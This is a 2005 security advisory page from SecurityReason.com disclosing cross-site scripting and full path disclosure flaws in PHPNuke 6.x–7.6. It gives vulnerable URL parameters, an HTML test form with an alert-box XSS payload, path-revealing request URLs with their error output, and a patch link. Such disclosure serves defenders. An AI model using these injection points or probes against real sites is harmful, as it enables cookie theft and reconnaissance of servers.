SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityReason Advisory

Arrow  Topic : PHPNuke x=>7.6 Multiple vulnerabilities PART 3
Arrow  SecurityAlert : 13
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : Yes
Arrow  Exploit Given : Yes
Arrow  Credit : sp3x
Arrow  Date : 07.09.2005

Arrow  Affected Software : PHPNuke x=>7.6

FREEWARE Network Scanner Security Events Montoring
Detect network vulnerabilities. Freeware dld! Monitor event logs for security. Dld 30-day eval!

Arrow  Advisory Text :  


-=[ Full path disclosure and XSS in PHPNuke ]=-

Author: sp3x
Date: 5. April 2004

In Memory of John Poul II :
===========================

"Love converts hearts and gives peace," - John Poul II
"To mi?o�? nawraca serca i daruje pokój ludzko�ci, która
wydaje si? czasem zagubiona i zdominowana przez si?? z?a, egoizmu i
strachu" - Jan Pawe? II [WIELKI]

Affected software :
===================
PHPNuke version : 6.x - 7.6

Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online
community or whatever you want to call it. The goal of PHP-Nuke is to have
an automated web site to distribute news and articles with users system.
Each user can submit comments to discuss the articles, just similar to
Slashdot and many others. Main features include: web based admin, surveys,
top page, access stats page with counter, user customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete comments,
moderation system, Referers page to know who link us, sections manager,
customizable HTML blocks, user and authors edit, an integrated Banners Ads
system, search engine, backend/headlines generation (RSS/RDF format), and
many, many more friendly functions. PHP-Nuke is written 100% in PHP and
requires Apache Web server, PHP and a SQL (MySQL, mSQL, PostgreSQL, ODBC,
ODBC_Adabas, Sybase or Interbase). Support for 25 languages, Yahoo like
search engine, Comments option in Polls, lot of themes, Ephemerids manager,
File Manager, Headlines, download manager, faq manager, advanced blocks
systems, reviews system, newsletter, categorized articles, multilanguage
content management, phpBB Forums included and a lot more.

Vulnerabilities :
*****************

Cross-site scripting - XSS :
============================

In PHPNuke there are XSS that can be used to steal cookies and do other
operations, which in
normal conditions are not permitted by browser's cross-domain security
restrictions.

Example :
=========

http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=mailpasswd&user
name=[XSS]
http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=avatarlist&avat
arcategory=[XSS]
http://[target]/[nuke_dir]/modules.php?name=Downloads&d_op=outsidedownloads
etup&lid=[XSS]

To test XSS for example in
http://[target]/[nuke_dir]/modules.php?name=Downloads&d_op=outsidedownloads
etup&lid=[XSS] we can
create a form.

test.html :
-----------
<form name="mantra" method="POST"
action="http://[target]/[nuke_dir]/modules.php">
<p>XSS:
<input type="text" name="lid">
<br>
<input type="hidden" name="name" value="Downloads">
<br>
<input type="hidden" name="d_op" value="outsidedownloadsetup">
</p>
<p>
<input type="submit" name="Submit" value="Go!">
<br>
</p>
</form>
-----------------
And enter to inputfield "XSS" this :<body onload="alert('XSS')";> and click
"Go!" :)

Full Path Disclosure :
======================

Full path to script must be kept in secret because it can lead to
successful attack on the
website. If the attacker know Full path to script , he can start searching
some more info on others folders or about the server where the site is and
then try to break in.

Many scripts can be accessed directly and this will provoke standard
php error messages, which leads to full path disclosure.

Examples :
----------

http://[target]/[nuke_dir]/index.php?forum_admin=1

Error message :
---------------
=====================================
Warning: main(): Unable to access ../../../config.php in
/[info]/www/html/mainfile.php on line 104

Warning: main(../../../config.php): failed to open stream: No such file or
directory in /[info]/www/html/mainfile.php on line 104

Fatal error: main(): Failed opening required '../../../config.php'
(include_path='.:/php/includes:/usr/share/php') in
/[info]/www/html/mainfile.php on line 104
======================================


More Full Path Disclosure :
---------------------------

http://[target]/[nuke_dir]/modules.php?name=Surveys&op=results&pollID=[id]&
mode=&order=&thold=&tid=[something]

Error message :
---------------
=====================================
Fatal error: Cannot redeclare head() in /[info]/phpnuke/header.php on line
28
=====================================

http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=avatarlist

Error message :
---------------
=====================================
Fatal error: Unknown function: nav() in
/[info]/phpnuke/modules/Your_Account/index.php on line 1462
=====================================


How to fix :
============

Download the new version of the script or update.
The fix : www.securityreason.com/patch/SecurityReason-Fix[2].rar
Also on www.nukefixes.com the fix will be avaible soon

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com

Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.